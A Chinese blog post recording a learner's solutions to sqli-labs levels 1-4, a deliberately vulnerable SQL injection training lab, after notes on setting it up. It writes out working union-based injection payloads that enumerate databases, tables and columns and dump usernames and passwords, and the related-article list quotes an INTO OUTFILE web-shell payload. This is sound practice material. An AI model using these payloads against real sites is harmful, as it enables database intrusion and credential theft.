SQL-labs练习记录(1~4)【入门】

最新推荐文章于 2022-07-05 17:58:21 发布
最新推荐文章于 2022-07-05 17:58:21 发布
阅读量154 收藏
点赞数 2
分类专栏: 网络安全 文章标签: mysql sql 网络安全 数据库 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bin789456/article/details/117308407
版权

SQL-labs练习记录(1~4)【入门】

写在前面

提升一下SQL注入能力,写点笔记。
一开始的环境配置可以说是多灾多难,首先是要调低php版本或者改靶场源文件,一开始是更改源文件的方式,要将所有带mysql的函数都换成mysqli的缀,同时会有一些参数上的变化,要查询相关函数来修改,但是最后还是在setup环境出现了问题。
最后选用的是调低版本的方案,在5.5以下就没问题了。
然后是靶场配置文件,要注意密码和数据库设置一致。
然后我以为成功了(显示了与其他文章一样的界面)却发现用不了,答案不匹配,甚至回显缺失,这里原因不明,可能与原电脑安装的数据库冲突。
最后在学长的帮助下,通过查看数据库图形化界面,查看实时setup过程,确实有出错产生,没有正确自动建立数据库及表单,手动放入表单,并且在特定的’security’库下建立才成功。
至此,终于可以开始了。
不得不提到的一点是,这篇文章使用到了一个插件,是firefox中的hackbar,在这里不仅会让我们的输入更加直观,不必在网址栏慢慢翻找之外,同时提供了编解码,SQL语句帮助的功能,非常好用,使用时要降低版本并禁止更新。

Less 1

首先输入1能够正常回显
开始探测:输入

?id=1 and 1=2

在这里插入图片描述
看是字符型还是整形,我们的查询地方是放在一对单引号中的。我们这样构造的原因是因为php的强制转换特性,用的是’==‘、’!=‘比较,类型不同仍旧可以比较,在这里如果页面返回正常,就说明默认转换过了,会转换为布尔类型,那么很有可能就是字符型注入。如果不正确,就说明很可能是整形注入

现在验证一下:

?id=1' and '1'='1
?id=1' and '1'='2

在这里插入图片描述
前者正确,后者语法正确,查询错误。那么确定为字符型,可以进行下一步了。
探测显示列数(表单数据可能很多,但列数一般并不多):

?id=1' order by 4 --+

在这里插入图片描述
显示没有第四列,减少参数值

?id=1' order by 3 --+

显示正常。说明有三列。
探测回显位置:

?id=-1' union select 1,2,3 --+

在这里插入图片描述

说明数据就从对应位置可以显示,我们要爆的数据就会显示在那里。
这里推荐在第三个位置,因为第二个位置会因为结束符的原因需要单独加上select(),比较麻烦。
首先查看当前数据库位置:
(union注意要使前面为假,这与or的原理是类似的)

?id=-1' union select 1,2,database() --+

在这里插入图片描述

查看所有数据库:

?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata --+

在这里插入图片描述
查看你需要的库的所有表:

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

在这里插入图片描述
这里由于我们一开始查询到我们所在位置为’security’所以我们查security库
查看你需要的表(users)的列:

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

筛选条件就承接了上个命令中的table_name
在这里插入图片描述
查看敏感数据:

?id=-1' union select 1,2,group_concat(concat(username,'~',password)) from security.users --+

在这里插入图片描述

由于我们有了上面的信息,那么我们可以直接写敏感数据的库和表名。
到这里,我们就完成了一个注入流程,从测试到查看敏感数据。

Less 2

按照上文方法进行测试,发现在这里就已经不能正确显示页面了。

?id=1 and 1=2

在这里插入图片描述

说明这很有可能是整形注入。也就是说参值为整形,不用闭合本来存在的 $id='xxx’字符型单引号。直接输在后面作为命令执行。
直接操作即可,甚至不用注释掉后面。这里直接放上少量截图,略过。
在这里插入图片描述
在这里插入图片描述

Less 3

一样的进行探测,发现报错信息有点不对劲,突然出现了一个括号的报错,说明原语句被改变了,那么在构造闭合时要闭合好括号。
在这里插入图片描述

?id=1') order by 4 --+

在这里插入图片描述

除了闭合的不同,其他就与前文一样了。

Less 4

一样开始探测,会发现它不报错了,只会在未查询到信息与查询到信息之间变化,说明探测也是一个不简单的任务,但是我们可以明显感觉到这里时一个字符型注入,因为如果是整形我们使用单引号之类很容易报错。
能够是字符而又不会损坏sql语句,同时又是字符型,那就是双引号了。(将单引号也带入查询)
报出错误
在这里插入图片描述

根据错误的信息,我们可以知道,这里自带了双引号和括号,那么构造闭合就行。其他的就无了。
在这里插入图片描述

sayo.
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
SQL注入之sqli-labs等(安装,配置)
weixin_46595570的博客
01-03 3712
简介 这次要使用的靶机环境是SQLi Labs,SQLi-Labs是一个专业的SQL注入练习平台,它是只专注SQL注入漏洞,以便我们研究学习SQL注入的整个注入过程,适用于GET和POST场景,包含了以下注入: 类型 方式 基于错误的注入 字符和整数型 基于报错的注入 双查询注入 盲注入 布尔型和时间型 更新查询注入 update 插入查询注入 insert Header头部注入 (基于Referer注入、基于UserAgent注入、..
MSSQL注入手工注入mssql提权
代码审计
04-18 2225
mssql数据库 mssql数据库相比mysql数据库本质上的框架是差不多的,使用的增,删,改,查命令是互相通的,mysql中使用的函数在mssql中有些会起不到作用点。 MSSQL数据库的基本知识 MSSQL中自带数据库信息 库名 相关功能 master 系统控制数据库,包含配置信息,用户登录信息,系统运行状态 model 模板数据库数据库时建立所有数据库的模板。 tempdb 临时容器,保存所有的临时表,存储过程和其他程序交互的临时文件 msdb 主要为用户使用,记录着计划
SQL注入漏洞(MSSQL注入)
errorr0
07-05 2421
MSSQL注入的入门讲解
sql注入学习(包括sqlilabs安装搭建注入环境步骤以及sqlmap安装操作说明链接地址)
热门推荐
莉莉安的博客
02-04 1万+
SQL注入: 就是把SQL命令插入到Web表单然后提交到所在页面请求(查询字符串),从而达到欺骗服务器执行恶意的SQL命令。 它是利用现在已有的应用程序,将SQL语句插入到数据库中执行,执行一些并非按照设计者意图的SQL语句。 SQL注入可以分为平台层注入和代码注入。前者是由不安全的数据库配置或平台漏洞所致。后者是程序员对输入未进行细致过滤产生 sqlilabs搭建注入环境: Sqli-labs是...
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
sql-labs通关技巧
03-01
SQL注入领域,`sql-labs` 是一个常用的练习平台,帮助学习者掌握SQL注入技巧。本篇将详细解析如何通过SQL注入攻击不同类型的靶场,以及如何利用自动化工具`sqlmap`进行辅助。 首先,我们需要识别注入点。在`less1...
SQL-labs/less1通关教程
最新发布
02-29
### SQL-labs/less1通关教程详解 #### 一、理解GET传参方式与SQL注入基础 本节介绍的是如何通过GET方式传递参数来进行SQL注入的基础操作。在Web开发中,GET请求通常用于向服务器发送数据,这些数据会被附加在URL...
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
SQL-li-labs则是针对SQL注入攻击的练习平台,帮助学习者理解如何预防这种类型的攻击。 首先,我们来详细了解一下PHPStudy。PHPStudy提供了一个简单的界面来管理PHP版本切换、Apache和Nginx服务器的启动与停止,以及...
安装upload-labs
10-22
安装upload-labs是网安入门教程系列的一部分,旨在帮助初学者学习文件上传漏洞的基础知识和实践经验。在这篇文章中,我们将一步步指导您如何安装upload-labs靶场,以便更好地学习文件上传漏洞。 安装upload-labs的...
sql_labs靶场练习
nidaxin的博客
11-05 667
符号含义:(1)?:作用为注释一个变量 (2)--+:+在这里相当于空格;整个是注释 判断字段数:?id=x'(可变) union select 1,2,3 --+ [1,2,3表示第几个字段] 判断字段数:?id=0' order by x --+ [其中可以先给x从小到大赋值,直到报错,就可知道字段数了] 判断注入点:?id=1 and 1=2 闭合注入点:?id=1 'and 1=2 --+ ?id=1 'and 1=1 --+ 查询数据库:?id=0' ...
sqli-labs个人练习 通关总结
Tajang的大千世界
07-10 726
这个系列是我在sqli-labs中练习SQL注入的解题过程。 随缘更新 less-1 打开关卡 根据提示得知我们应该传入id值,先?id=1'测试一下 报错,把单引号去掉试试 成功返回数据,再测试?id=2 返回数据,再尝试一下?id=2-1 仍然显示id=2的数据,排除数字型注入,大概是字符型注入了,尝试封闭单引号并且注释后面的语句 猜解字段数,?id=1' order by 1,2,3 --+ 没有报错,测试是否有4个字段?id=1' order by 1,2,3,4 --+ 报错,说明
POP链实例解析学习
bin789456的博客
11-28 8079
写在前面 POP链就是利用魔法方法在里面进行多次跳转然后获取敏感数据的一种payload,实战应用范围暂时没遇到,不过在CTF比赛中经常出现这样的题目,同时也经常与反序列化一起考察,可以理解为是反序列化的一种拓展,泛用性更强,涉及到的魔法方法也更多。 基本魔法方法 我用的代码如下: <?php class A{ public $a="hi"; public $b="no"; function __construct() {
Kali:SYN简单泛洪攻击(DOS攻击)
bin789456的博客
04-23 8074
Kali:SYN简单泛洪攻击原理解析工具原理解析正式攻击思路攻击演示 原理解析 SYN泛洪攻击,利用三次握手的缺陷,让tcp连接始终处于未成功连接的半连接状态。 攻击机仅发出第一次握手,不对返回信息进行确认,服务器由于需要不断处理连接信息,就会占用资源。 一旦攻击机发包速度较快,服务器就会出现崩溃,处于拒绝服务的状态。 工具原理解析 Nmap:扫描存活主机,选择攻击对象。 hping3:构造SYN包并发送的工具,能够指定端口,包头信息,发送速度。 具体手册可以使用-h命令查看,中文手册详解提供以下链接: h
访问控制漏洞和权限提升 | PortSwigger(burpsuite官方靶场)| Part 3
bin789456的博客
03-23 4496
写在前面 现在是综合应用,来看看横向到纵向的权限提升。 通常情况下,横向权限提升攻击可以变成纵向权限提升,通过危害更高权限的用户。例如,水平升级可能允许攻击者重置或捕获属于另一个用户的密码。如果攻击者以管理用户为目标并破坏了他们的帐户,那么他们可以获得管理访问权限,从而执行垂直权限升级。 User ID controlled by request parameter with password disclosure ...
访问控制漏洞和权限提升 | PortSwigger(burpsuite官方靶场)| Part 1
bin789456的博客
03-18 4435
写在前面 一些概念会直接引用,主要是对于靶场和关键知识点会进行讲解。 靶场链接 资料引用 访问控制概念 简单的来说就是应用程序首先会判断用户的身份(账号密码登录),随后确认后续请求是否由该用户发出(会话管理),然后判断是否允许用户执行“所请求的操作”或访问“所请求的资源(访问控制)” 1、从用户角度访问控制模型分为以下类型: 垂直访问控制:控制不同权限等级的用户访问应用程序不同的功能;如“管理员”可以修改/删除账号,而普通账号无法操作。 水平访问控制:控制用户只能访问自己的资源,而不能访问其他用户相同
PHP反序列化-__wakeup()方法漏洞(CVE-2016-7124)
bin789456的博客
08-13 3658
写在前面 wakeup()是在反序列化的基础之上进行的,如果你不是很清楚反序列化漏洞,可以点击下方: [超链接] 漏洞影响的版本 PHP5 < 5.6.25 PHP7 < 7.0.10 漏洞利用方法 若在对象的魔法函数中存在的__wakeup方法,那么之后再调用 unserilize() 方法进行反序列化之前则会先调用__wakeup方法,但是序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行 漏洞出现情况 1.可以之间或简介控制序列化结果 2.__wakeup(
登陆身份识别机制(Session工作机制,PHP版)【含登陆程序脚本】
bin789456的博客
11-08 3236
写在前面 当登录时究竟发生了什么?如何去追踪关键信息,关键信息又在哪里?看了很多不管是http基本认证还是session的机制,体会不够深,还是不如自己边写边理解和记忆来的深刻。 参考资料:《PHP、MySQL与JavaScript学习手册》 第五版 --中国电力出版社 希望能对你理解登陆身份识别上有所帮助。 基础知识 这里仅简单说一说。 cookie在首部中交换,在网页的html内容之前发送,html一旦发送,就无法再发送cookie了。 例如: 1.浏览器发起请求,请求头会指定请求文件路径和服务器 2.
PHP字符串解析特性 ($GET/$POST参数绕过)(含例题 buuctf easycalc)
bin789456的博客
09-20 2357
了解一下 PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事: 1)删除空白符 2)将某些字符转换为下划线(包括空格) 例如: 下面这个图就是测试出来在能够哪些地方添加并得到特殊处理。 通过以上特性,当waf限制get参数类型或者长度等等,我们就可以很轻松的绕过。 参考链接:https://www.freebuf.com/articles/web/213359.html 例题 buuctf-easycalc 打开题目,查看源代码 提示中显示有WAF,同时有一个检验函数,有一个
sql-labs安装
08-28
4. 导入 SQL-Labs 的数据库结构。进入到您解压缩的 SQL-Labs 文件夹中,找到 `db-structure.sql` 文件,并使用以下命令导入数据库结构: ``` mysql -u your_username -p sqli < db-structure.sql ``` 替换 `...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值